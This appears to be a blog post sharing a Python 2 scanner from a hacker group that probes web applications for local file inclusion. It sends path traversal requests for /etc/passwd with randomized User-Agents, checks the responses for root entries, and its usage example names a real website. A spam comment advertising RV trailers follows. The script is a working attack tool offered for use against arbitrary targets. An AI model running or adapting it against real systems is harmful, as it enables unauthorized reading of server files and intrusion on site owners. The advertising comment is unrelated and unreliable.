Code:
# Author: parkdream1 # Messenger: h3x4r # Local File Include Scaner
Code:
Usage: h3x4r.py <Target IP> <Port> <Path> Example: python h3x4r.py playerstage.sourceforge.net 80 index.php?src=
-- Random User-Agent
-- Coded Use Language Python
Banner()
Not Vulnerability
Vulnerability
Code:
#!/usr/bin/python
# Author: parkdream1
# Messenger: h3x4r
# (c) R00TW0RM - Private Community
# https://r00tw0rm.com/
# Local File Include Scaner
# Greets: To all members of r00tw0rm !!
import socket,sys,re,random,time
from random import choice
passwd = ["/etc/passwd",
"../etc/passwd",
"../../etc/passwd",
"../../../etc/passwd",
"../../../../etc/passwd",
"../../../../../etc/passwd",
"../../../../../../etc/passwd",
"../../../../../../../etc/passwd",
"../../../../../../../../etc/passwd",
"../../../../../../../../../etc/passwd",
"../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../../../etc/passwd"
"/etc/passwd",
"../etc/passwd",
"../../etc/passwd",
"../../../etc/passwd",
"../../../../etc/passwd",
"../../../../../etc/passwd",
"../../../../../../etc/passwd",
"../../../../../../../etc/passwd",
"../../../../../../../../etc/passwd",
"../../../../../../../../../etc/passwd",
"../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../../etc/passwd",
"../../../../../../../../../../../../../etc/passwd"]
user = ['Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))',
'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 7.1; Trident/5.0)',
'Mozilla/5.0 (X11; U; Linux i586; de; rv:5.0) Gecko/20100101 Firefox/5.0',
'Mozilla/5.0 (X11; U; Linux amd64; rv:5.0) Gecko/20100101 Firefox/5.0 (Debian)',
'Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:5.0) Gecko/20110619 Firefox/5.0',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; chromeframe/12.0.742.112)',
'Opera/9.80 (X11; Linux i686; U; ru) Presto/2.8.131 Version/11.11',
'Opera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11',
'Mozilla/5.0 (Windows NT 5.1; U; en; rv:1.8.1) Gecko/20061208 Firefox/5.0 Opera 11.11']
agent = random.choice(user)
def scan():
for lfi in passwd:
try:
r = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
r.connect((target, port))
r.send("GET /"+path+lfi+" HTTP/1.0\r\n")
r.send("Host: "+target+"\r\n")
r.send("User-Agent: "+agent+"\r\n\r\n")
print "[*] Send Request Success"
print "http://"+target+"/"+path+lfi
page = r.recv(1024)
fullpage = ""
while len(page):
fullpage = fullpage + page
page = r.recv(1024)
r.close()
except Exception, e:
print "[-] Cant Not Send Request"
print e
sys.exit(1)
r00t = re.search("root:x:0:0:",fullpage)
if r00t:
print "\033[32m[*] Request Vulnerability\n"
sys.exit(1)
else:
print "[-] Request Is Not Vulnerability\n"
time.sleep(1)
def banner():
print "\n"
print "****************************************************************************"
print "|| Local File Include Scaner ||"
print "|| by parkdream1 ||"
print "|| (c) R00TW0RM - Private Community ||"
print " Fucking from "+target+" on port "+str(port)
print "****************************************************************************"
print "\n"
if __name__ == '__main__':
if len(sys.argv) != 4:
print >>sys.stderr, "Usage:", sys.argv[0], "<Target IP> <Port> <Path>"
print "Example: python", sys.argv[0], "playerstage.sourceforge.net 80 index.php?src="
sys.exit(1)
target, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
banner()
scan()
©2012, copyright BLACK BURN



nice post Als trailers are specialize in building quality RVs including A-frame, Fifth wheel, Toy hauler, Motor homes, Travel Trailers and has a great service team.
ReplyDeleteMore info: http://www.hwytrailer.com/